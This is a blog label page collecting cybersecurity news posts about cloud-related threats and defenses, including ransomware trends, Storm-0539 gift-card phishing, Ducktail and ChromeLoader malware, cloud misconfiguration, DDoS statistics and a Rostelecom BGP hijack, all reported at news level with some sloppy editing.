Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Cloud. Show all posts

The Rise of Manual Techniques in Ransomware Attacks: A Growing Threat

The Rise of Manual Techniques in Ransomware Attacks: A Growing Threat

A recent report by CrowdStrike observes on a disturbing trend: the increasing use of manual techniques in ransomware attacks. This shift towards hands-on-keyboard activities is not only making these attacks more sophisticated but also more challenging to detect and mitigate.

The Surge in Interactive Intrusions

According to CrowdStrike’s findings, there has been a staggering 55% increase in interactive intrusions over the past year. These intrusions, characterized by direct human involvement rather than automated scripts, account for nearly 90% of e-crime activities. This trend underscores a critical shift in the tactics employed by cybercriminals, who are now leveraging manual techniques to bypass traditional security measures and achieve their malicious objectives.

Why Manual Techniques?

The adoption of manual techniques in ransomware attacks offers several advantages to cybercriminals. Firstly, these techniques allow attackers to adapt and respond in real-time to the defenses they encounter. Unlike automated attacks, which follow predefined scripts, manual intrusions enable attackers to think on their feet, making it harder for security systems to predict and counter their moves.

Secondly, manual techniques often involve the use of legitimate tools and credentials, making it difficult for security teams to distinguish between malicious and benign activities. This tactic, known as “living off the land,” involves using tools that are already present in the target environment, such as PowerShell or Remote Desktop Protocol (RDP). By blending in with normal network traffic, attackers can evade detection for extended periods, increasing the likelihood of a successful attack.

The Impact on the Technology Sector

The technology sector has been particularly hard-hit by this surge in manual ransomware attacks. CrowdStrike’s report indicates a 60% rise in such attacks targeting tech companies. This sector is an attractive target for cybercriminals due to its vast repositories of sensitive data and intellectual property. Additionally, technology companies often have complex and interconnected systems, providing multiple entry points for attackers to exploit.

The consequences of a successful ransomware attack on a tech company can be devastating. Beyond the immediate financial losses from ransom payments, these attacks can lead to prolonged downtime, loss of customer trust, and significant reputational damage. In some cases, the recovery process can take months, further compounding the financial and operational impact.

What to do?

Enhanced Monitoring and Detection: Implement advanced monitoring tools that can detect anomalous behavior indicative of manual intrusions. Behavioural analytics and machine learning can help identify patterns that deviate from the norm, providing early warning signs of an attack.

Regular Security Training: Educate employees about the latest phishing techniques and social engineering tactics used by cybercriminals. Regular training sessions can help staff recognize and report suspicious activities, reducing the risk of initial compromise.

Zero Trust Architecture: Adopt a Zero Trust approach to security, where no user or device is trusted by default. Implement strict access controls and continuously verify the identity and integrity of users and devices accessing the network.

Incident Response Planning: Develop and regularly update an incident response plan that outlines the steps to take in the event of a ransomware attack. Conduct regular drills to ensure that all team members are familiar with their roles and responsibilities during an incident.

Backup and Recovery: Maintain regular backups of critical data and ensure that these backups are stored securely and inaccessible from the main network. Regularly test the recovery process to ensure that data can be restored quickly in the event of an attack.

Moroccan Cybercrime Group Storm-0539 Exploits Gift Card Systems with Advanced Phishing Attacks

 

A Morocco-based cybercrime group, Storm-0539, is making headlines for its sophisticated email and SMS phishing attacks aimed at stealing and reselling gift cards. Microsoft's latest Cyber Signals report reveals that this group is responsible for significant financial theft, with some companies losing up to $100,000 daily. 

First identified by Microsoft in December 2023, Storm-0539, also known as Atlas Lion, has been active since late 2021. The group employs social engineering techniques to harvest victims' credentials through adversary-in-the-middle (AitM) phishing pages. They exploit this access to register their own devices, bypass authentication, and maintain persistent access to create fraudulent gift cards. 

The group's attack strategy includes gaining covert access to cloud environments for extensive reconnaissance, targeting large retailers, luxury brands, and fast-food chains. They aim to redeem and sell gift cards on black markets or use money mules to cash out. This marks an evolution from their previous tactics of stealing payment card data via malware on point-of-sale (PoS) devices. 

Microsoft noted a 30% increase in Storm-0539's activities between March and May 2024, emphasizing their deep understanding of cloud systems to manipulate gift card issuance processes. In addition to stealing login credentials, Storm-0539 targets secure shell (SSH) passwords and keys, which are either sold or used for further attacks. The group uses internal company mailing lists to send phishing emails, enhancing their credibility and sets up new phishing websites by exploiting free trial or student accounts on cloud platforms. 

The FBI has warned about Storm-0539's smishing attacks on retail gift card departments, using sophisticated phishing kits to bypass multi-factor authentication (MFA). The group's ability to adapt and pivot tactics after detection underscores their persistence and resourcefulness. Microsoft urges companies to monitor gift card portals closely and implement conditional access policies to strengthen security. They highlight the effectiveness of using additional identity-driven signals, such as IP address and device status, alongside MFA. 

Meanwhile, Enea researchers have identified broader criminal campaigns exploiting cloud storage services like Amazon S3 and Google Cloud Storage for SMS-based gift card scams. These scams use legitimate-looking URLs to bypass firewalls and redirect users to malicious websites that steal sensitive information. 

Storm-0539's operations exemplify the increasing sophistication of financially motivated cybercriminals, borrowing techniques from state-sponsored actors to remain undetected. As these threats evolve, robust cybersecurity measures and vigilant monitoring are crucial to protect sensitive information and financial assets.

Empowering Indigenous Data Sovereignty: The TTP-Microsoft Partnership

 

The recent partnership between Te Tumu Paeroa (TTP), the office of the Māori Trustee, and Microsoft for the forthcoming data centres in Aotearoa New Zealand marks a groundbreaking development with potential global implications for indigenous data sovereignty. This agreement, described as "groundbreaking," is based on TTP's Māori data sovereignty framework, which has been under development for the past three years. 

As anchor tenants for Microsoft's data centres, TTP will play a pivotal role in safeguarding Māori data as a precious asset in an increasingly digital world. Ruth Russell, Te Tumu Paeroa’s Kaitautari Pārongo Matua (Chief Information Officer), emphasized the significance of protecting Māori data, describing it as a "taonga" or treasure. Anchor tenancy enables TTP to host data in Aotearoa, ensuring it remains within the country's sovereign borders. 

The agreement aims to deepen connections between landowners and their whenua (land) and facilitate faster recovery from major weather events while supporting innovation on key issues such as climate change. TTP's services include trust administration, property management, income distribution, and client fund management, making this partnership crucial for enhancing Māori data sovereignty. One of the primary benefits of the new cloud service is that data stored at the centre will not leave New Zealand's sovereign borders, ensuring compliance with local laws and regulations. 

This advanced data residency feature offered by Microsoft instills confidence that data resides in the desired territory, aligning with TTP's framework and recognizing the sovereignty of Māori data. Dan Te Whenua Walker from Microsoft highlights the opportunity for Māori to leverage artificial intelligence (AI) while acknowledging some uncertainties regarding its cultural implications. He emphasizes the importance of TTP's framework in guiding the adoption of AI, ensuring it aligns with Māori aspirations and values. DDS IT, responsible for migrating data to Microsoft's cloud servers, considers this partnership a unique opportunity. The data migration process involves transferring data between locations and formats, with the full transfer expected to take between 12 to 24 months. 

Moreover, the new data centre is set to be the most sustainable globally, emphasizing energy efficiency and environmental considerations. The partnership between TTP and Microsoft represents a significant step towards advancing Māori data sovereignty and leveraging technology to benefit indigenous communities. By hosting data within Aotearoa's sovereign borders and adhering to Māori principles of kaitiakitanga (guardianship), this collaboration sets a precedent for indigenous data governance worldwide.

Bridging the Gap Between Cloud vs On-premise Security

 

In the current landscape, the prevalence of the cloud era is undeniable, and the market is characterized by constant dynamism. Enterprises, in order to maintain relevance amid this competitive environment, are unmistakably demonstrating a keen interest in embracing cloud technologies. What motivates this significant shift? 

Cloud-centric security strategies, exemplified by initiatives like Secure Access Service Edge (SASE) and Security Service Edge (SSE), encompassing components such as Secure Web Gateway (SWG), Cloud Access Security Brokers (CASB), Data Loss Prevention (DLP), and Zero Trust Network Access (ZTNA), efficiently extend security to wherever corporate users, devices, and resources are located—leveraging the cloud as the central hub. 

With all security functionalities seamlessly delivered and managed through a unified interface, the security of both inbound and outbound traffic, often referred to as north-south traffic, is significantly fortified. 

On the flip side, the internal network's east-west traffic, which moves within the confines of data centers and the network but does not cross the network perimeter, remains untouched by the security checks implemented through cloud-based measures. 

A potential workaround involves keeping a traditional data center firewall dedicated to overseeing and regulating internal, east-west traffic. However, this hybrid security approach introduces increased expenses and intricacies in handling diverse security solutions. Many organizations strive to address these challenges by opting for integrated, cloud-based security stacks to streamline management and mitigate the complexities associated with maintaining separate security measures. 

To ensure comprehensive security coverage for organizations, a solution is required that safeguards both north-south and east-west traffic. The key lies in orchestration through a centralized, cloud-based console. Achieving this can be approached in two ways: 

1. Via WAN Firewall Policy 

Cloud-native security frameworks like SASE and SSE can provide east-west protection by directing internal traffic through the nearest point of presence (PoP). Unlike traditional local firewalls with their own setup limitations, SSE PoP allows firewall policies to be managed centrally through the platform's console. Admins can easily create access rules in the unified console, such as permitting authorized users on the corporate VLAN with approved, Active Directory-registered devices to access specific resources in the on-premise data center, following Zero Trust Network Access (ZTNA) principles. 

2. Via LAN Firewall Policy 

In a security-conscious scenario, where an IoT VLAN's CCTV camera needs access to an internal server, disabling default internet/WAN access is wise to prevent cyber threats. Implementing data center firewall policies at the Point of Presence (PoP) may not affect devices like IoT cameras with no internet access. 

SASE and SSE platforms address this by empowering administrators to set firewall policies on the local SD-WAN device. Organizations connect to SASE/SSE PoPs through this SD-WAN device, allowing direct rule configuration for internal LAN traffic. Pre-defined LAN firewall policies are locally enforced, with unmatched traffic sent to the PoP for further assessment, enhancing security management efficiency.

Vietnamese Cybercriminals Exploit Malvertising to Target Facebook Business Accounts

Cybercriminals associated with the Vietnamese cybercrime ecosystem are exploiting social media platforms, including Meta-owned Facebook, as a means to distribute malware. 

According to Mohammad Kazem Hassan Nejad, a researcher from WithSecure, malicious actors have been utilizing deceptive ads to target victims with various scams and malvertising schemes. This tactic has become even more lucrative with businesses increasingly using social media for advertising, providing attackers with a new type of attack vector – hijacking business accounts.

Over the past year, cyber attacks against Meta Business and Facebook accounts have gained popularity, primarily driven by activity clusters like Ducktail and NodeStealer, known for targeting businesses and individuals operating on Facebook. 

Social engineering plays a crucial role in gaining unauthorized access to user accounts, with victims being approached through platforms such as Facebook, LinkedIn, WhatsApp, and freelance job portals like Upwork. Search engine poisoning is another method employed to promote fake software, including CapCut, Notepad++, OpenAI ChatGPT, Google Bard, and Meta Threads.

Common tactics among these cybercrime groups include the misuse of URL shorteners, the use of Telegram for command-and-control (C2), and legitimate cloud services like Trello, Discord, Dropbox, iCloud, OneDrive, and Mediafire to host malicious payloads.

Ducktail, for instance, employs lures related to branding and marketing projects to infiltrate individuals and businesses on Meta's Business platform. In recent attacks, job and recruitment-related themes have been used to activate infections. 

Potential targets are directed to fraudulent job postings on platforms like Upwork and Freelancer through Facebook ads or LinkedIn InMail. These postings contain links to compromised job description files hosted on cloud storage providers, leading to the deployment of the Ducktail stealer malware.

The Ducktail malware is designed to steal saved session cookies from browsers, with specific code tailored to take over Facebook business accounts. These compromised accounts are sold on underground marketplaces, fetching prices ranging from $15 to $340.

Recent attack sequences observed between February and March 2023 involve the use of shortcut and PowerShell files to download and launch the final malware. The malware has evolved to harvest personal information from various platforms, including X (formerly Twitter), TikTok Business, and Google Ads. It also uses stolen Facebook session cookies to create fraudulent ads and gain elevated privileges.

One of the primary methods used to take over a victim's compromised account involves adding the attacker's email address, changing the password, and locking the victim out of their Facebook account.

The malware has incorporated new features, such as using RestartManager (RM) to kill processes that lock browser databases, a technique commonly found in ransomware. Additionally, the final payload is obfuscated using a loader to dynamically decrypt and execute it, making analysis and detection more challenging.

To hinder analysis efforts, the threat actors use uniquely generated assembly names and rely on SmartAssembly, bloating, and compression to obfuscate the malware.

Researchers from Zscaler also observed instances where the threat actors initiated contact using compromised LinkedIn accounts belonging to users in the digital marketing field, leveraging the authenticity of these accounts to aid in social engineering tactics. This highlights the worm-like propagation of Ducktail, where stolen LinkedIn credentials and cookies are used to log in to victims' accounts and expand their reach.

Ducktail is just one of many Vietnamese threat actors employing shared tools and tactics for fraudulent schemes. A Ducktail copycat known as Duckport, which emerged in late March 2023, engages in information stealing and Meta Business account hijacking. Notably, Duckport differs from Ducktail in terms of Telegram channels used for command and control, source code implementation, and distribution, making them distinct threats.

Duckport employs a unique technique of sending victims links to branded sites related to the impersonated brand or company, redirecting them to download malicious archives from file hosting services. Unlike Ducktail, Duckport replaces Telegram as a channel for passing commands to victims' machines and incorporates additional information stealing and account hijacking capabilities, along with taking screenshots and abusing online note-taking services as part of its command and control chain.

"The Vietnamese-centric element of these threats and high degree of overlaps in terms of capabilities, infrastructure, and victimology suggests active working relationships between various threat actors, shared tooling and TTPs across these threat groups, or a fractured and service-oriented Vietnamese cybercriminal ecosystem (akin to ransomware-as-a-service model) centered around social media platforms such as Facebook," WithSecure said.

Remote Work and the Cloud Create Various Endpoint Security Challenges

At the recent Syxsense Synergy event, cybersecurity experts delved into the ever-evolving challenges faced by security and endpoint management. With the increasing complexity of cloud technologies, advancements in the Internet of Things, and the widespread adoption of remote work, the landscape of cybersecurity has become more intricate than ever before. 

These experts shed light on the pressing issues surrounding this field. Based on a survey conducted by the Enterprise Strategy Group (ESG), it has been discovered that the average user presently possesses approximately seven devices for both personal and office use. 

Moreover, the ESG survey revealed a notable connection between the number of security and endpoint management tools employed within an enterprise and the frequency of breaches experienced. Among the organizations surveyed, 6% utilized fewer than five tools, while 27% employed 5 to 10 tools. 33% of organizations employed 11 to 15 tools, whereas the remaining organizations implemented more than 15 tools to manage their security and endpoints. 

Understand the concept of Endpoints and why their security is important while working remotely?

Endpoints encompass various physical devices that establish connections with computer networks, facilitating the exchange of information. These devices span a wide range, including mobile devices, desktop computers, virtual machines, embedded devices, and servers. 

Additionally, endpoints extend to Internet-of-Things (IoT) devices such as cameras, lighting systems, refrigerators, security systems, smart speakers, and thermostats. When a device establishes a network connection, the transmission of information between the device, such as a laptop, and the network can be linked to a conversation taking place between two individuals over a phone call. 

Endpoints are attractive targets for cybercriminals due to their vulnerability and their role as gateways to corporate data. As the workforce becomes more distributed, protecting endpoints has become increasingly challenging. Small businesses are particularly vulnerable, as they can serve as entry points for criminals to target larger organizations, often lacking robust cybersecurity defenses. 

Data breaches are financially devastating for enterprises, with the global average cost being $4.24 million and $9.05 million in the United States. Remote work-related breaches incur an additional average cost of $1.05 million. The majority of breach costs are attributed to lost business, including customer turnover, revenue loss from system downtime, and the expenses of rebuilding reputation and acquiring new customers. 

With the increasing mobility of workforces, organizations face a range of endpoint security risks. These common threats include: 

Phishing: A form of social engineering attack that manipulates individuals into divulging sensitive information. 

Ransomware: Malicious software that encrypts a victim's data and demands a ransom for its release.

Device loss: Leading to data breaches and potential regulatory penalties, lost or stolen devices pose significant risks to organizations. 

Outdated patches: Failure to apply timely software updates leaves systems vulnerable, enabling exploitation by malicious actors. 

Malware ads (malvertising): Online advertisements are used as a medium to distribute malware and compromise systems. 

Drive-by downloads: Automated downloads of software onto devices without the user's knowledge or consent. 

According to Ashley Leonard, Syxsense founder, and CEO, the biggest reason behind increasing challenges related to endpoint security is lack of training. “If people are not properly trained and grooved in on their endpoint and security tools, you are going to find devices and systems misconfigured, not maintained properly, and with critical patches undeployed. Training is vital, but it is much easier to train people on a single tool,” he further added.

Growing Public Cloud Spending is Leading to a Shadow Data Risk


Public cloud spending and adoption has emerged as a growing sector. As per the assumptions made by analysts, organizations will spend $591.8 billion on cloud infrastructure and services this year, more than 20.7% from last year. 

According to the Forrester, the public cloud market is set to reach $1 trillion by year 2026, with the lion’s share of investment directed to the big four, i.e. Alibaba, Amazon Web Services, Google Cloud, and Microsoft. 

So, What Is Going On? 

In the wake of pandemic, businesses hastened their cloud migration and reaped the rewards as cloud services sped up innovation, offering elasticity to adjust to change demand, and scaled with expansion. Even as the C-suite reduces spending in other areas, it is certain that there is no going back. The demand from businesses for platform-as-a-service (PaaS), which is expected to reach $136 billion in 2023, and infrastructure-as-a-service (IaaS), which is expected to reach $150 billion, is particularly high. 

Still, this rapid growth, which in fact caught business strategists and technologies by surprise, has its own cons. If organizations do not take the essential actions to increase the security of public cloud data, the risks are likely to grow considerably. 

Shadow Data Is Growing Due to Lax Security Controls 

The challenges posed by "shadow data," or unknown, uncontrolled public cloud data, is a result of a number of issues. Business users are creating their own applications, and programmers are constantly creating new instances of their own code to create and test new applications. A number of these services retain and utilize critical data with no knowledge of the IT and security staff. Versioning, which allows several versions of data to be stored in the same bucket in the cloud, adds risks if policies are not set up correctly. 

Unmanaged data repositories are frequently ignored when the rate of innovation quickens. In addition, if third parties or unrelated individuals are given excessive access privileges, sensitive data that is adequately secured could be transferred to an unsafe location, copied there, or become vulnerable. 

Three Steps to Improve Public Cloud Data Security 

A large number of security experts (82%) are aware of, and in fact, concerned about the growing issues pertaining to the public cloud data security problem. These professionals can swiftly aid in minimizing the hazards by doing the following: 

  • Discover and Classify all Cloud Data 

Teams can automatically find all of their cloud data, not just known or tagged assets, thanks to a next-generation public cloud data security platform. All cloud data storages, including managed and unmanaged assets, virtual machines, shadow data stores, data caches and pipelines, and big data, are detected. This data is used by the platform to create an extensive, unified data catalog for multi-cloud environments used by enterprises. All sensitive data, including PII, PHI, and transaction data from the payment card industry (PCI), is carefully identified and categorized in the catalogs. 

  • Secure and Control Cloud Data 

Security teams may apply and enforce the proper security policies and verify data settings against their organization's specified guardrails with complete insights into their sensitive cloud data. Public cloud data security may aid in exposing complicated policy breaches, which could further help in prioritizing risk-based mannerisms, on the basis of data sensitivity level, security posture, volume, and exposure. 

  • Remediate Risks and Monitor Activities Without Hindering the Data Flow 

The aforementioned is a process named data security posture management, that offers recommendations that are customized for every cloud environment, thus making them more effective and relevant. 

Teams can then begin organizing sensitive data without interfering with corporate operations. Teams will be prompted by a public cloud data security platform to implement best practices, such as enabling encryption and restricting third-party access, and practicing greater data hygiene by eliminating unnecessary sensitive data from the environment. 

Moreover, security teams can utilize the platform to enable constant monitoring of data. This way, security experts can efficiently identify policy violations and ensure that the public cloud data is following the firm’s mentioned guidelines and security postures, no matter where it is stored, used, or transferred in the cloud.  

A Large Number of Ventures Suffering From Cloud Security Attacks

The advent of technology led malicious actors, to invade the privacy of users' systems in a few steps. Cloud security is one such technology that has increasingly worked to fortify users' data from threat actors. 

However, as per the statistics, even the latest cyber security is at risk; a report publicized by Synk shows, that 80% of the enterprises suffered from these actors’ invasion in just the past 12 months. The wide adoption of cloud security has been considered a major reason for a rapidly increasing number of cases. 

There have been several bigger cases that show the breach of cloud security. Accenture is one of them which came under the claws of cloud security attacks. Once in 2017 when the company's AWS S3 storage was unsecured and was made available for public reach. The attackers found confidential API data, digital certificates, meta info, etc. and they used it to blackmail and squeeze money from the. The second was when in 202, the firm got struck by LockBit ransomware. 
 
As per Synk’s report, 58% of the people were predicting that they again will face another cloud security attack in the future, and 25% were afraid that they must have endured a breach in their cloud storage but were not aware of it. These thoughts were creating a negative impact on cloud security. Whereas, there are many other similar cases like Accenture, where organisations left their cloud storage open to be accessed publically, and did not have even basic security. 

The CEO and Co-founder of Orca, Avi Shua stated that other than the cloud platforms providing safe spaces for data storage in cloud infrastructure, the state of the business’s workloads, identities, etc. stored in the cloud are also equally responsible for the security of the public cloud data.

For making 100% from cloud storage and evading the problems in cloud securities, it is important to include experts in cloud-native security. and to avoid such incidents as Accenture cases it becomes a necessity to add additional training and education. As an institute can’t deal with such a situation without planning, they should work with proper strategies and focus on how to avoid the risk of 

To make the best of cloud storage and avoid falling prey to problems related to cloud security, it becomes pertinent to include experts in cloud-native security. To avoid such incidents from occurring in Accenture and other such companies, it's important that additional training and education about cloud security handling is provided by the relevant institutes and organisations. It's implausible to deal with such a situation without planning, the companies should work with proper strategies and focus on how to avoid the risk of data theft.  

ChromeLoader Malware Hijacks Chrome Browser via Malicious Extension

 

The browser-hijacking malware called ChromeLoader is witnessing a new surge in activity since its discovery earlier this year, researchers at Red Canary, wrote in a blog post this week. 

ChromeLoader uses PowerShell, an automation and configuration management framework, to add a malicious extension to a victim's Chrome browser for nefarious purposes. The malicious extension drastically modifies the victim's web browser settings to show search results that promote unwanted software, fake giveaways, surveys, and adult games and dating sites. 

The malware's creators receive financial benefits due to the marketing affiliation from these ad-supported pages and redirect traffic to these commercial sites. There are multiple hijackers of this kind, but ChromeLoader is unique due to its persistence, volume, and infection route, which involves the aggressive use of PowerShell. 

Exploiting PowerShell 

According to Red Canary researchers, who have been tracking the strain since early February, the creators of the hijacker use a malicious ISO archive file to target their victims. ChromeLoader gets initial access into a system by being distributed as an ISO file that looks like a torrent or a cracked video game. The researchers have also noticed Twitter posts promoting cracked Android games and offering QR codes that lead to malware-hosting sites. 

When a victim double-clicks on the ISO file in Windows 10 or later, the ISO file will be mounted as a drive on the victim's machine. This ISO file contains an executable that pretends to be a game crack or keygen, using names like "CS_Installer.exe." 

Finally, ChromeLoader executes and decodes a PowerShell command that fetches an archive from a remote resource and loads it as a Google Chrome extension. Once the scheduled task executes PowerShell and loads the extension, it is silently removed with the PowerShell module invoke schtasks.exe and is often less frequently monitored as an anti-forensic methodology. 

 "This is a novel method for loading a malicious extension into Chrome that I have not seen before, nor has it been observed by Red Canary's intelligence team in other malware," researchers said. While other bad actors could capitalize on this method, they still need to place a portable executable on the victim machine to ultimately use the load-extension PowerShell technique." 

Additionally, the creators of ChromeLoader target macOS systems by using DMG (Apple Disk Image) files, which is a more common format on macOS. 

"To maintain persistence, the macOS variation of ChromeLoader will append a preference (`plist`) file to the `/Library/LaunchAgents` directory," explains Red Canary's report. This ensures that every time a user logs into a graphical session, ChromeLoader's Bash script can continually run."

The Future Comes With Promising Edge Technology, Say Experts

 

The huge amount of data continuously collected via billions of sensors and devices that comprise the IoT can pose a serious threat for organizations that depend on primitive intelligence and analytics tools. Since the beginning, these devices have not been much effective and needed central servers to process data, mostly cloud-based servers (public) which could be far away. Currently, however, for the same price, you can get more computing power, making way for AI-powered, and edge located devices that make their own commands. 

As per the experts, by 2025, 75% of organization-generated data would be created and processed by an edge. From driverless cars capable of processing and analyzing real-time traffic data (without cloud), to factory systems that can process sensor data for future maintenance. This rapid development in the age of smart devices at the edge will provide vast opportunities in businesses and for users. The capability to create automated and store data for analysis linked to the source is most likely to give operational advantage, produce new and effective services, enhance scalability and transfer data away from central servers. 

Along with this, the fast edge development requires that security leaders adhere to discipline even though the distribution of data that seems to be on the horizon. It must be important for the user to understand the relation between edge and IoT (Internet of Things), the edge allows computation to run on device/ local network rather than sending data to be analyzed on public cloud servers or central data centers, which is time-consuming and also costs resources. 

After that, the analyzed data can be sent to its endpoint. Hence, edge computing lowers the bandwidth risks and analyses data within proximity. It is very crucial in IoT as there exist billions of sensors and systems across the world that produce processed data, let it be inter-connected home devices, health wearables, or industrial machinery. "Especially for use cases like healthcare monitoring and safety apps – where milliseconds count – edge computing and cheaper, more powerful AI-powered devices are emerging as perfect partners to process the massive amounts of information generated by connected devices," reports HelpNetSecurity.

Cloud Misconfiguration is Still the Leading Source of Cloud Data Violations

 

Almost everybody by now is workings from home and 84 percent are worried that new security vulnerabilities have been generated with the quick move towards 100 percent remote working. 

Cloud service providers built their administration panels' user interface purposefully to mislead consumers and charge for more services than originally intended. 

Although it was never demonstrated as a systematic business strategy, reports and alerts of a data breach have overwhelmed the internet in recent years since a cloud-based database has indeed been misconfigured and confidential information ultimately leaked. 

Throughout the past month, Censys, a security company that specializes in census-like inspections on the internet, looked closely at the cloud-based services, hoping to uncover what the best potential origin of misconfiguration might be for cloud-based businesses. As per the study, Censys has found over 1.93 million cloud server databases that have been displayed publicly without even any firewall or other authentication measures. The security company arguments that threat actors will discover and target these databases utilizing older vulnerability exploits. In addition, if the database was unintentionally leaked, it could also use a weak or even no password at all, disclosing it to all those who have detected its IP address. 

Censys reported having been used to scan MySQL, Postgres, Redis, MSSQL, MongoDB, Elasticsearch, Memcached, and Oracle and that nearly 60 percent of all disclosed servers were MySQL databases which represent 1.15 million of the 1.93 million overall exposed DBs. 

The security agency also searched to find ports that could also be exposed by clouds service as they are normally used for remote management applications like SSH, RDP, VNC, SMB, Telnet, Team Viewer, and PC Anywhere. Censys retained that access to all these remote managing port must not be easily discovered but rather secured by Access Control Lists, VPN tunnel, or other traffic filtering solutions, although the underlying cause of these applications is that the systems can be remotely logged into. 

Another very significant discovery was indeed the virtual exposure of the RDP login screens by more than 1.93 million servers. 

Microsoft and several others have also indicated that many violations of security have also been caused by attackers obtaining access to an enterprise through compromised RDP credentials. Which included attacks on a broad range of actors, including DDoS botnets, crypto mining activities, ransomware gangs, and government-funded actors. 

Most organizations do not operate internally with just one cloud services provider infrastructure, but instead use several solutions, many of which might not have the same access or default settings, allowing several systems to become accessible even though IT personnel are not supposed to do so. While some cloud providers have taken measures to improve their dashboards and to clarify how those controls operate, the wording of each cloud provider is still substantially different, and some system administrators are still often confused. 

Censys said, “it expects the issue of misconfigured services to remain a big problem for companies going forward.”

A resurgence in DDoS Attacks amidst Global COVID-19 lockdowns


Findings of Link11's Security Operations Center (LSOC) uncovered a 97% increase in the number of attacks for the months of April, May, and June in 2020 when compared with the attacks during the same period in the previous year, with an increment of 108% in May 2020.

The annual report incorporates the data which indicated that the recurrence of DDoS attacks relied upon the day of the week and time, with most attacks concentrated around weekends of the week and evenings. 

More attacks were registered on Saturdays, and out of office hours on weekdays. 

Marc Wilczek, COO, Link11 says, “The pandemic has forced organizations to accelerate their digital transformation plans, but has also increased the attack surface for hackers and criminals – and they are looking to take full advantage of this opportunity by taking critical systems offline to cause maximum disruption. This ‘new normal’ will continue to represent a major security risk for many companies, and there is still a lot of work to do to secure networks and systems against the volume attacks. Organizations need to invest in security solutions based on automation, AI, and Machine Learning that are designed to tackle multi-vector attacks and networked security mechanisms...” 


Key findings from the annual report include: 

Multivector attacks on the rise: 52% of attacks consisted of a few strategies for the attack, making them harder to defend against. One attack included at least 14 techniques.

The growing number of reflection amplification vectors:: More usually utilized vectors included DNS, CLDAP, and NTP, while WS Discovery and Apple Remote Control are still being utilized in the wake of being discovered in 2019. 

DDoS sources for reflection amplification attacks distributed around the globe: The top three most significant source nations in H1 2020 were the USA, China, and Russia. Be that as it may, the ever-increasing number of attacks have been traced back to France. 

The average attack bandwidth remains high: The attack volume of DDoS attacks has balanced out at a relatively elevated level, at an average of 4.1 Gbps. In most attacks, 80% were up to 5 Gbps. The biggest DDoS attack was halted at 406 Gbps. 

DDoS attacks from the cloud: At 47%, the percentage of DDoS attacks from the cloud was higher than the entire year 2019 (45%). Instances from every single established provider were 'misused', however, the more usual ones were Microsoft Azure, AWS, and Google Cloud. 

The longest DDoS attack lasted 1,390 minutes – 23 hours and interval attacks, which are set like little pinpricks and flourish on repetition lasted an average of 13 minutes.


BGP Hijacking Attacks Google, Amazon and Other Famous Networks' Traffic!


As per reports, a telecommunication provider that is owned by Russia rerouted traffic which was intended for the most imminent Content Delivery Networks (CDNs) and cloud host providers of the globe.

The entire re-direction kept on for around an hour during which it affected over 8,500 traffic routes of the internet. The concerned organizations happen to be few of the most celebrated ones.

Per sources, the brands range across well-known names like Cloudflare, Digital Ocean, Linode, Google, Joyent, Facebook, LeaseWeb, Amazon, GoDaddy, and Hetzner.

Reportedly, all the signs of this attack indicate towards its being a case of hijacking the Border Gateway Protocol, also known as, BGP hijacking. It is the illegitimate takeover of IP prefixes by a hijacker to redirect traffic.

This gives a lot of power in the hands of the hijacker because they could at any time “publish an announcement” stating that the servers of a particular company are on their network. As a result of which all of e.g. Amazon’s traffic would end up on the hijacker’s servers.

In earlier times when Hypertext Transfer Protocol wasn’t as widely used to encrypt traffic, BGP hijacking was a lucrative way to carry Man-in-the-Middle (MitM) attacks and catch and modify traffic.

But in recent times, analysis and decryption of traffic later in time has become easier because of BGP hijacking, as the encryption gets weaker with time.

This predicament isn’t of a new kind. It has been troubling the cyber-world for a couple of decades, mainly because they aim at boosting the BGP’s security. Despite working on several projects there hasn’t been much advancement in improving the protocol to face them.

Google’s network has been a victim of BGP hijacking by a Nigerian entity before. Researchers mention that it is not necessary for a BGP hijacking to be malicious.

Reportedly, “mistyping the ASN” (Autonomous System Number) is one of the other main reasons behind a BGP hijacking, as it is the code via which internet units are recognized and ends up accidentally redirecting traffic.

Per sources, China Telecom stands among the top entities that have committed BGP hijacking, not so “accidentally”. Another famous one on a similar front is “Rostelecom”.

The last time Rostelecom seized a lot of attention was when the most gigantic of financial players were victimized by BGP hijacking including HSBC, Visa, and MasterCard to name a few.

The last time, BGPMon didn’t have much to say however this time, Russian Telecom is in a questionable state, per sources. They also mention that it is possible for the hijack to have occurred following the accidental exposure of the wrong BGP network by an internal Rostelecom traffic shaping system.

Things took a steep turn when reportedly, Rostelecom’s upstream providers re-publicized the freshly declared BGP routes all across the web aggravating the hijack massively.

Per researchers, it is quite a difficult task to say for sure if a BGP hijacking was intentional of accidental. All that could be said is that the parties involved in the hijack make the situation suspicious.